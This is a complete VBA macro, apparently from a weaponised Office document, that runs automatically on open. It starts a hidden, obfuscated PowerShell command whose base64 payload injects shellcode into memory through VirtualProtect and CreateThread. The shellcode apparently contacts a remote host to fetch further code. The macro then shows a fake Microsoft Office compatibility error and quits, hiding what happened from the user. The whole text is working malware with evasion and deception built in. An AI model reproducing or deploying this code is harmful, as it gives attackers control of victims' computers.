Sub Auto_Open()
Dim GodEARj
GodEARj =  " /w 1 /C ""sv AE -;sv rS ec;s"
GodEARj = GodEARj + "v nO ((gv AE).value.toString()+(gv rS)"
GodEARj = GodEARj + ".value.toString());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (gv nO).value.to"
GodEARj = GodEARj + "String() ('JAB3AGoAPQAnACQARgBZAD0AJwAnAFsAeQBBAGw"
GodEARj = GodEARj + "AKAAoACIAbQBzAHYAIgArACIAYwAiACsAIgByAHQALgBkAGwAb"
GodEARj = GodEARj + "AAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB"
GodEARj = GodEARj + "lAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAdABTAG0AKAB1A"
GodEARj = GodEARj + "GkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0"
GodEARj = GodEARj + "AbwB1AG4AdAApADsAWwB5AEEAbAAoACIAawBlAHIAbgBlAGwAM"
GodEARj = GodEARj + "wAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbAB"
GodEARj = GodEARj + "pAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuA"
GodEARj = GodEARj + "HQAUAB0AHIAIAB6AEEAdwAoAEkAbgB0AFAAdAByACAAbABwAFQ"
GodEARj = GodEARj + "AaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAa"
GodEARj = GodEARj + "QBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB"
GodEARj = GodEARj + "0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzA"
GodEARj = GodEARj + "CwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGU"
GodEARj = GodEARj + "AcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4AR"
GodEARj = GodEARj + "gBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgB"
GodEARj = GodEARj + "lAGEAZABJAGQAKQA7AFsAeQBBAGwAKAAiAGsAZQByAG4AZQBsA"
GodEARj = GodEARj + "DMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGw"
GodEARj = GodEARj + "AaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAb"
GodEARj = GodEARj + "gB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB"
GodEARj = GodEARj + "0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkA"
GodEARj = GodEARj + "HIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACA"
GodEARj = GodEARj + "AdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAI"
GodEARj = GodEARj + "ABvAHUAdAAgAHUAaQBuAHQAIAByAFUAQQApADsAWwB5AEEAbAA"
GodEARj = GodEARj + "oACIAbQBzAHYAIgArACIAYwAiACsAIgByAHQALgBkAGwAbAAiA"
GodEARj = GodEARj + "CkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQ"
GodEARj = GodEARj + "AZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgAS"
GodEARj = GodEARj + "QBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwB"
GodEARj = GodEARj + "yAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7A"
GodEARj = GodEARj + "CQARgBZAD0AJABGAFkALgByAGUAcABsAGEAYwBlACgAIgB6AEE"
GodEARj = GodEARj + "AdwAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAAiACsAIgByACIAK"
GodEARj = GodEARj + "wAiAGUAYQBkACIAKQA7ACQARgBZAD0AJABGAFkALgByAGUAcAB"
GodEARj = GodEARj + "sAGEAYwBlACgAIgB0AFMAbQAiACwAIAAiAGMAYQBsAGwAIgArA"
GodEARj = GodEARj + "CIAbwAiACsAIgBjACIAKQA7ACQARgBZAD0AJABGAFkALgByAGU"
GodEARj = GodEARj + "AcABsAGEAYwBlACgAIgB5AEEAbAAiACwAIAAiAEQAbABsAEkAb"
GodEARj = GodEARj + "QBwAG8AIgArACIAcgAiACsAIgB0ACIAKQA7ACQAawBwAD0AIgA"
GodEARj = GodEARj + "mAGYAYwAsACYAZQA4ACwAJgA4AGYALAAmADAAMAAsACYAMAAwA"
GodEARj = GodEARj + "CwAJgAwADAALAAmADYAMAAsACYAOAA5ACwAJgBlADUALAAmADM"
GodEARj = GodEARj + "AMQAsACYAZAAyACwAJgA2ADQALAAmADgAYgAsACYANQAyACwAJ"
GodEARj = GodEARj + "gAzADAALAAmADgAYgAsACYANQAyACwAJgAwAGMALAAmADgAYgA"
GodEARj = GodEARj + "sACYANQAyACwAJgAxADQALAAmADMAMQAsACYAZgBmACwAJgA4A"
GodEARj = GodEARj + "GIALAAmADcAMgAsACYAMgA4ACwAJgAwAGYALAAmAGIANwAsACY"
GodEARj = GodEARj + "ANABhACwAJgAyADYALAAmADMAMQAsACYAYwAwACwAJgBhAGMAL"
GodEARj = GodEARj + "AAmADMAYwAsACYANgAxACwAJgA3AGMALAAmADAAMgAsACYAMgB"
GodEARj = GodEARj + "jACwAJgAyADAALAAmAGMAMQAsACYAYwBmACwAJgAwAGQALAAmA"
GodEARj = GodEARj + "DAAMQAsACYAYwA3ACwAJgA0ADkALAAmADcANQAsACYAZQBmACw"
GodEARj = GodEARj + "AJgA1ADIALAAmADgAYgAsACYANQAyACwAJgAxADAALAAmADUAN"
GodEARj = GodEARj + "wAsACYAOABiACwAJgA0ADIALAAmADMAYwAsACYAMAAxACwAJgB"
GodEARj = GodEARj + "kADAALAAmADgAYgAsACYANAAwACwAJgA3ADgALAAmADgANQAsA"
GodEARj = GodEARj + "CYAYwAwACwAJgA3ADQALAAmADQAYwAsACYAMAAxACwAJgBkADA"
GodEARj = GodEARj + "ALAAmADUAMAAsACYAOABiACwAJgA1ADgALAAmADIAMAAsACYAO"
GodEARj = GodEARj + "ABiACwAJgA0ADgALAAmADEAOAAsACYAMAAxACwAJgBkADMALAA"
GodEARj = GodEARj + "mADgANQAsACYAYwA5ACwAJgA3ADQALAAmADMAYwAsACYAMwAxA"
GodEARj = GodEARj + "CwAJgBmAGYALAAmADQAOQAsACYAOABiACwAJgAzADQALAAmADg"
GodEARj = GodEARj + "AYgAsACYAMAAxACwAJgBkADYALAAmADMAMQAsACYAYwAwACwAJ"
GodEARj = GodEARj + "gBjADEALAAmAGMAZgAsACYAMABkACwAJgBhAGMALAAmADAAMQA"
GodEARj = GodEARj + "sACYAYwA3ACwAJgAzADgALAAmAGUAMAAsACYANwA1ACwAJgBmA"
GodEARj = GodEARj + "DQALAAmADAAMwAsACYANwBkACwAJgBmADgALAAmADMAYgAsACY"
GodEARj = GodEARj + "ANwBkACwAJgAyADQALAAmADcANQAsACYAZQAwACwAJgA1ADgAL"
GodEARj = GodEARj + "AAmADgAYgAsACYANQA4ACwAJgAyADQALAAmADAAMQAsACYAZAA"
GodEARj = GodEARj + "zACwAJgA2ADYALAAmADgAYgAsACYAMABjACwAJgA0AGIALAAmA"
GodEARj = GodEARj + "DgAYgAsACYANQA4ACwAJgAxAGMALAAmADAAMQAsACYAZAAzACw"
GodEARj = GodEARj + "AJgA4AGIALAAmADAANAAsACYAOABiACwAJgAwADEALAAmAGQAM"
GodEARj = GodEARj + "AAsACYAOAA5ACwAJgA0ADQALAAmADIANAAsACYAMgA0ACwAJgA"
GodEARj = GodEARj + "1AGIALAAmADUAYgAsACYANgAxACwAJgA1ADkALAAmADUAYQAsA"
GodEARj = GodEARj + "CYANQAxACwAJgBmAGYALAAmAGUAMAAsACYANQA4ACwAJgA1AGY"
GodEARj = GodEARj + "ALAAmADUAYQAsACYAOABiACwAJgAxADIALAAmAGUAOQAsACYAO"
GodEARj = GodEARj + "AAwACwAJgBmAGYALAAmAGYAZgAsACYAZgBmACwAJgA1AGQALAA"
GodEARj = GodEARj + "mADYAOAAsACYANgBlACwAJgA2ADUALAAmADcANAAsACYAMAAwA"
GodEARj = GodEARj + "CwAJgA2ADgALAAmADcANwAsACYANgA5ACwAJgA2AGUALAAmADY"
GodEARj = GodEARj + "AOQAsACYANQA0ACwAJgA2ADgALAAmADQAYwAsACYANwA3ACwAJ"
GodEARj = GodEARj + "gAyADYALAAmADAANwAsACYAZgBmACwAJgBkADUALAAmADMAMQA"
GodEARj = GodEARj + "sACYAZABiACwAJgA1ADMALAAmADUAMwAsACYANQAzACwAJgA1A"
GodEARj = GodEARj + "DMALAAmADUAMwAsACYANgA4ACwAJgAzAGEALAAmADUANgAsACY"
GodEARj = GodEARj + "ANwA5ACwAJgBhADcALAAmAGYAZgAsACYAZAA1ACwAJgA1ADMAL"
GodEARj = GodEARj + "AAmADUAMwAsACYANgBhACwAJgAwADMALAAmADUAMwAsACYANQA"
GodEARj = GodEARj + "zACwAJgA2ADgALAAmAGIAYgAsACYAMAAxACwAJgAwADAALAAmA"
GodEARj = GodEARj + "DAAMAAsACYAZQA4ACwAJgBiADAALAAmADAAMAAsACYAMAAwACw"
GodEARj = GodEARj + "AJgAwADAALAAmADIAZgAsACYANABlACwAJgA3ADUALAAmADMAM"
GodEARj = GodEARj + "AAsACYANQA3ACwAJgAzADcALAAmADMAMgAsACYANAA5ACwAJgA"
GodEARj = GodEARj + "2AGYALAAmADYAZQAsACYAMwAyACwAJgA2AGYALAAmADUAZgAsA"
GodEARj = GodEARj + "CYAMwA4ACwAJgA0ADQALAAmADMANwAsACYANwA4ACwAJgA1ADc"
GodEARj = GodEARj + "ALAAmADQAYwAsACYANQAzACwAJgA2AGEALAAmADUAOQAsACYAN"
GodEARj = GodEARj + "gA3ACwAJgA0AGIALAAmADYAMwAsACYANAA4ACwAJgA1ADEALAA"
GodEARj = GodEARj + "mADMAOQAsACYANwAyACwAJgA0ADYALAAmADAAMAAsACYANQAwA"
GodEARj = GodEARj + "CwAJgA2ADgALAAmADUANwAsACYAOAA5ACwAJgA5AGYALAAmAGM"
GodEARj = GodEARj + "ANgAsACYAZgBmACwAJgBkADUALAAmADgAOQAsACYAYwA2ACwAJ"
GodEARj = GodEARj + "gA1ADMALAAmADYAOAAsACYAMAAwACwAJgAzADIALAAmAGUAOAA"
GodEARj = GodEARj + "sACYAOAA0ACwAJgA1ADMALAAmADUAMwAsACYANQAz'+'ACwAJg"
GodEARj = GodEARj + "A1ADcALAAmADUAMwAsACYANQA2ACwAJgA2ADgALAAmAGUAYgAs"
GodEARj = GodEARj + "ACYANQA1ACwAJgAyAGUALAAmADMAYgAsACYAZgBmACwAJgBkAD"
GodEARj = GodEARj + "UALAAmADkANgAsACYANgBhACwAJgAwAGEALAAmADUAZgAsACYA"
GodEARj = GodEARj + "NgA4ACwAJgA4ADAALAAmADMAMwAsACYAMAAwACwAJgAwADAALA"
GodEARj = GodEARj + "AmADgAOQAsACYAZQAwACwAJgA2AGEALAAmADAANAAsACYANQAw"
GodEARj = GodEARj + "ACwAJgA2AGEALAAmADEAZgAsACYANQA2ACwAJgA2ADgALAAmAD"
GodEARj = GodEARj + "cANQAsACYANAA2ACwAJgA5AGUALAAmADgANgAsACYAZgBmACwA"
GodEARj = GodEARj + "JgBkADUALAAmADUAMwAsACYANQAzACwAJgA1ADMALAAmADUAMw"
GodEARj = GodEARj + "AsACYANQA2ACwAJgA2ADgALAAmADIAZAAsACYAMAA2ACwAJgAx"
GodEARj = GodEARj + "ADgALAAmADcAYgAsACYAZgBmACwAJgBkADUALAAmADgANQAsAC"
GodEARj = GodEARj + "YAYwAwACwAJgA3ADUALAAmADEANgAsACYANgA4ACwAJgA4ADgA"
GodEARj = GodEARj + "LAAmADEAMwAsACYAMAAwACwAJgAwADAALAAmADYAOAAsACYANA"
GodEARj = GodEARj + "A0ACwAJgBmADAALAAmADMANQAsACYAZQAwACwAJgBmAGYALAAm"
GodEARj = GodEARj + "AGQANQAsACYANABmACwAJgA3ADUALAAmAGMAZAAsACYANgA4AC"
GodEARj = GodEARj + "wAJgBmADAALAAmAGIANQAsACYAYQAyACwAJgA1ADYALAAmAGYA"
GodEARj = GodEARj + "ZgAsACYAZAA1ACwAJgA2AGEALAAmADQAMAAsACYANgA4ACwAJg"
GodEARj = GodEARj + "AwADAALAAmADEAMAAsACYAMAAwACwAJgAwADAALAAmADYAOAAs"
GodEARj = GodEARj + "ACYAMAAwACwAJgAwADAALAAmADQAMAAsACYAMAAwACwAJgA1AD"
GodEARj = GodEARj + "MALAAmADYAOAAsACYANQA4ACwAJgBhADQALAAmADUAMwAsACYA"
GodEARj = GodEARj + "ZQA1ACwAJgBmAGYALAAmAGQANQAsACYAOQAzACwAJgA1ADMALA"
GodEARj = GodEARj + "AmADUAMwAsACYAOAA5ACwAJgBlADcALAAmADUANwAsACYANgA4"
GodEARj = GodEARj + "ACwAJgAwADAALAAmADIAMAAsACYAMAAwACwAJgAwADAALAAmAD"
GodEARj = GodEARj + "UAMwAsACYANQA2ACwAJgA2ADgALAAmADEAMgAsACYAOQA2ACwA"
GodEARj = GodEARj + "JgA4ADkALAAmAGUAMgAsACYAZgBmACwAJgBkADUALAAmADgANQ"
GodEARj = GodEARj + "AsACYAYwAwACwAJgA3ADQALAAmAGMAZAAsACYAOABiACwAJgAw"
GodEARj = GodEARj + "ADcALAAmADAAMQAsACYAYwAzACwAJgA4ADUALAAmAGMAMAAsAC"
GodEARj = GodEARj + "YANwA1ACwAJgBlADUALAAmADUAOAAsACYAYwAzACwAJgA1AGYA"
GodEARj = GodEARj + "LAAmAGUAOAAsACYANgA5ACwAJgBmAGYALAAmAGYAZgAsACYAZg"
GodEARj = GodEARj + "BmACwAJgAzADEALAAmADMAOQAsACYAMwAyACwAJgAyAGUALAAm"
GodEARj = GodEARj + "ADMAMQAsACYAMwA2ACwAJgAzADgALAAmADIAZQAsACYAMwAxAC"
GodEARj = GodEARj + "wAJgAyAGUALAAmADMAMQAsACYAMwA1ACwAJgAwADAAIgA7ACQA"
GodEARj = GodEARj + "bwBsAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQ"
GodEARj = GodEARj + "BtACAAJABGAFkAIAAtAE4AYQBtAGUAIAAiAHUAbQAiACAALQBu"
GodEARj = GodEARj + "AGEAbQBlAHMAIABBAEsAUgA7ACQAbwBsAD0AJABvAGwALgByAG"
GodEARj = GodEARj + "UAcABsAGEAYwBlACgAIgBBAEsAUgAiACwAIAAiAFcAaQBuADMA"
GodEARj = GodEARj + "MgBGAHUAIgArACIAbgAiACsAIgBjAHQAaQBvAG4AcwAiACkAOw"
GodEARj = GodEARj + "BbAGIAeQB0AGUAWwBdAF0AJABrAHAAIAA9ACAAJABrAHAALgBy"
GodEARj = GodEARj + "AGUAcABsAGEAYwBlACgAIgAmACIALAAiAFkAdABFAGYAeAAiAC"
GodEARj = GodEARj + "kALgByAGUAcABsAGEAYwBlACgAIgBZAHQARQBmACIALAAgACIA"
GodEARj = GodEARj + "MAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABmAGMAPQ"
GodEARj = GodEARj + "AwAHgAMQAwADAANgA7AGkAZgAgACgAJABrAHAALgBMACAALQBn"
GodEARj = GodEARj + "AHQAIAAwAHgAMQAwADAANgApAHsAJABmAGMAPQAkAGsAcAAuAE"
GodEARj = GodEARj + "wAfQA7ACQAWABDAD0AJABvAGwAOgA6AGMAYQBsAGwAbwBjACgA"
GodEARj = GodEARj + "MAB4ADEAMAAwADYALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQ"
GodEARj = GodEARj + "AkAHIAVQBBACAAPQAgADAAOwBmAG8AcgAoACQARQBBAD0AMAA7"
GodEARj = GodEARj + "ACQARQBBACAALQBsAGUAKAAkAGsAcAAuAEwAZQBuAGcAdABoAC"
GodEARj = GodEARj + "0AMQApADsAJABFAEEAKwArACkAewAkAG8AbAA6ADoAbQBlAG0A"
GodEARj = GodEARj + "cwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFgAQwAuAFQAbw"
GodEARj = GodEARj + "BJAG4AdAAzADIAKAApACsAJABFAEEAKQAsACAAJABrAHAAWwAk"
GodEARj = GodEARj + "AEUAQQBdACwAIAAxACkAfQA7ACQAbwBsADoAOgBWAGkAcgB0AH"
GodEARj = GodEARj + "UAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFgAQwAsACAAMAB4ADEA"
GodEARj = GodEARj + "MAAwADYALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAHIAVQ"
GodEARj = GodEARj + "BBACkAOwAkAG8AbAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBh"
GodEARj = GodEARj + "AGQAKAAwACwAMAB4ADAAMAAsACQAWABDACwAMAAsADAALAAwAC"
GodEARj = GodEARj + "kAOwAnADsAJAB4AG0APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoA"
GodEARj = GodEARj + "VABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeA"
GodEARj = GodEARj + "B0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBk"
GodEARj = GodEARj + "AGUALgBHAGUAdABCAHkAdABlAHMAKAAkAHcAagApACkAOwAkAH"
GodEARj = GodEARj + "AAeAA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABNAHkA"
GodEARj = GodEARj + "PQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAYQBtAEkATgAgAD0AIA"
GodEARj = GodEARj + "AiAEMAOgBcACQATQB5AFwAcwB5AHMAdwBvAHcANgA0AFwAJABN"
GodEARj = GodEARj + "AHkAJABwAHgAXAB2ADEALgAwAFwAJABwAHgAIgA7ACQATABEAE"
GodEARj = GodEARj + "QAdQAgAD0AIAAnAFQAIgArACIAcgAiACsAIgB1AGUAJwA7AGkA"
GodEARj = GodEARj + "ZgAoAFsAZQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEkAcw"
GodEARj = GodEARj + "A2ADQAQgBpAHQATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABl"
GodEARj = GodEARj + "AG0AIAAtAGUAcQAgACcAJABMAEQARAB1ACcAKQB7ACQAcAB4AD"
GodEARj = GodEARj + "0AIAAkAGEAbQBJAE4AfQA7ACQAcgBnAD0AIgAgACQAcAB4ACAA"
GodEARj = GodEARj + "aABiAFgAegAgACQAeABtACIAOwAkAHIAZwA9ACQAcgBnAC4Acg"
GodEARj = GodEARj + "BlAHAAbABhAGMAZQAoACIAaABiAFgAegAiACwAIAAiAC0AbgBv"
GodEARj = GodEARj + "AGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHIAZwA=')""
GodEARj = GodEARj + """


Dim iFZEFFMUQ
iFZEFFMUQ = "S" & "h" & "e" & "l" & "l" 
Dim wXEoBsdb
wXEoBsdb = "W" & "S" & "c" & "r" & "i" & "p" & "t" 
Dim yIyYLBqIDKc
yIyYLBqIDKc = wXEoBsdb & "." & iFZEFFMUQ
Dim rZKKeKzoK
Dim eUZdVDPIk
Set rZKKeKzoK = VBA.CreateObject(yIyYLBqIDKc)
Dim waitOnReturn As Boolean: waitOnReturn = False
Dim windowStyle As Integer: windowStyle = 0
Dim FtvTODW
FtvTODW = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e"  & " "
rZKKeKzoK.Run FtvTODW & GodEARj, windowStyle, waitOnReturn

Dim title As String
title = "Microsoft Office (Compatibility Mode)"
Dim msg As String
Dim intResponse As Integer
msg = "This application appears to have been made with an older version of the Microsoft Office product suite. Please have the author save this document to a newer and supported format. [Error Code: -219]"
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub